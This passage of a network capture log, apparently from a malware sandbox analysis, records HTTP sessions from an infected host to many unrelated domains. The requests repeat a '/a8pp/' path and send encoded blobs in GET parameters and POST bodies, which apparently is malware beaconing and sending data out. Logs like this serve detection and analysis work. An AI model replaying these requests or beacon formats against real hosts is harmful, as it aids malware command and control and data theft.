                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:39:41.713315964 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:41 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        server-timing: processing;dur=47
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b97b4955-fbe5-4d04-be7e-2a02c7a4a286-1717504781
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlco%2BlQ6hFNysQsqB46Is34qIzUecMxEdikN7wxQZ1lTAIm1XygyCV3Eu%2BDiGk3ntg5NX3lkt3m3PMJ4xVuhV3ow5nrObUp9epWvabl12rtxMdAOECqviu%2FgQZM1cTG


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        81 | 192.168.11.30 | 49875 | 23.227.38.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:44.071583986 CEST | 471 | OUT | GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:44.255162001 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=10, db;dur=2, asn;desc="60068", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="589x", requestID;desc="3aaba6a7-f224-49b9-bc39-7a807289a133-1717504784"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: 3aaba6a7-f224-49b9-bc39-7a807289a133-1717504784
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyavHzD%2F1OeN671BTfsYQlyZ9kKeTLKcczzAnz6%2BCZ79AshbEoI4wP%2FyRzM%2B6DvZ%2FNd6ugksBz6nAFwPKId5zydmR3bH2zgW4a2SSlL0fu1x%2BjfDk52wLmbdG1SsJk41lYFZjCoOAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-ne


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        82 | 192.168.11.30 | 49876 | 217.70.184.50 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:49.481605053 CEST | 763 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGRjcELyAF+K2UGb0r3DAMM2PV562cOMcUZsUo+sQQ7rQcVTz0ul9P73cHHAoVHrFTyICRGcYhfvgMt/cKmPu2qW3Vq4sqP8MoIvCu1otWoHyCFlv2r4zV469t9uQvI5m+f6P4MNsjHAxRpoVtxrNCdNwaRhdNK+akMWzV4QQ1+6t4b1ZN5GIbUA==
                                        Jun 4, 2024 14:39:49.691998959 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:49 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        83 | 192.168.11.30 | 49877 | 217.70.184.50 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:52.231210947 CEST | 783 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:52.443501949 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:52 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        84 | 192.168.11.30 | 49878 | 217.70.184.50 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:54.977902889 CEST | 1700 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:55.190674067 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        85 | 192.168.11.30 | 49879 | 217.70.184.50 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:57.709409952 CEST | 476 | OUT | GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:57.920452118 CEST | 1289 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:39:57 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:39:57.920466900 CEST | 886 | IN | Data Raw: 72 65 73 75 6c 74 73 20 6f 66 20 63 79 62 65 72 70 73 79 63 68 73 65 63 75 72 69 74 79 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:39:57.920483112 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        86 | 192.168.11.30 | 49880 | 192.207.62.21 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:40:35.854449987 CEST | 730 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:40:36.031620026 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:35 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        87 | 192.168.11.30 | 49881 | 192.207.62.21 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:40:38.550308943 CEST | 750 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:40:38.719877005 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:38 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        88 | 192.168.11.30 | 49882 | 192.207.62.21 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:40:41.252587080 CEST | 1667 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Origin: http://www.vgjimei.icu
                                        Referer: http://www.vgjimei.icu/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:40:41.424671888 CEST | 1176 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:41 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        89 | 192.168.11.30 | 49883 | 192.207.62.21 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:40:43.956228018 CEST | 460 | OUT | GET /a8pp/?2NlhHLS8=OIafhQlqd3+U0X685uCjXpA/yYYLTXRf5vcl7I4tT0pe2zvQLHkCRhCjRsaaEiaqAczN9yym/x5p7g+8tSCureiRSn+8K4wSoicHodjwuTrKVPMbvJXSPao=&80k=Qv4d HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.vgjimei.icu
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:40:44.124578953 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:40:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Cache-Control: no-cache
                                        Data Ascii: 5fb<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                        Jun 4, 2024 14:40:44.124620914 CEST | 447 | IN | Data Raw: 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 a3 80 e6 9f a5 e6 8f 90 e4 ba a4 e5 86 85 e5 ae b9 ef bc 9b 3c 2f 6c 69 3e 0a
                                        Data Ascii: ><p class="t2"></p><ol><li></li><li></li><li></li></ol></div></div></body><scrip
                                        Jun 4, 2024 14:40:44.124635935 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        90 | 192.168.11.30 | 49888 | 91.195.240.19 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:09.241153002 CEST | 466 | OUT | GET /a8pp/?2NlhHLS8=/NPZ6ym1eSqP6E/qwOmQvYjKsz7zkRsccrcByesNZAVEstX0SolnWK8jgzxt8MISaNzEdIb6rnMbXZkqzFIAORFEfuZ8IH0a3kCasVRTZJxsOlTMl/y3o9s=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.peptily.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:09.465466022 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        91 | 192.168.11.30 | 49889 | 34.120.137.41 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:14.601763010 CEST | 474 | OUT | GET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:14.747421980 CEST | 606 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:41:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge1
                                        Via: 1.1 google
                                        Connection: close
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        92 | 192.168.11.30 | 49890 | 160.124.114.188 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:20.072335958 CEST | 475 | OUT | GET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:20.382594109 CEST | 355 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:41:20 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        93 | 192.168.11.30 | 49891 | 91.195.240.19 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:25.629314899 CEST | 478 | OUT | GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:25.855757952 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        94 | 192.168.11.30 | 49892 | 172.67.205.56 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:31.000834942 CEST | 475 | OUT | GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:31.206630945 CEST | 962 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:41:31 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKi95Qqu%2FS6fpbloQwfATJEkH%2BQDdLyOp7ykGPSi3Lbn5y9LdmNfAOl%2FIaGwR%2BnlNSSlqWUj5dSt2eDf30BxmscuzlTB2asZTLeBn%2FankZ7wmTzfJVhN4iA%2B4%2F2d9p6jO5yi2RIdSqgGdoho"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7ff612fe28dfd-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:41:31.206644058 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        95 | 192.168.11.30 | 49893 | 162.0.237.22 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:37.239459038 CEST | 470 | OUT | GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:41:37.422058105 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:41:37 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        96 | 192.168.11.30 | 49894 | 64.190.62.22 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:41:42.655119896 CEST | 472 | OUT | GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
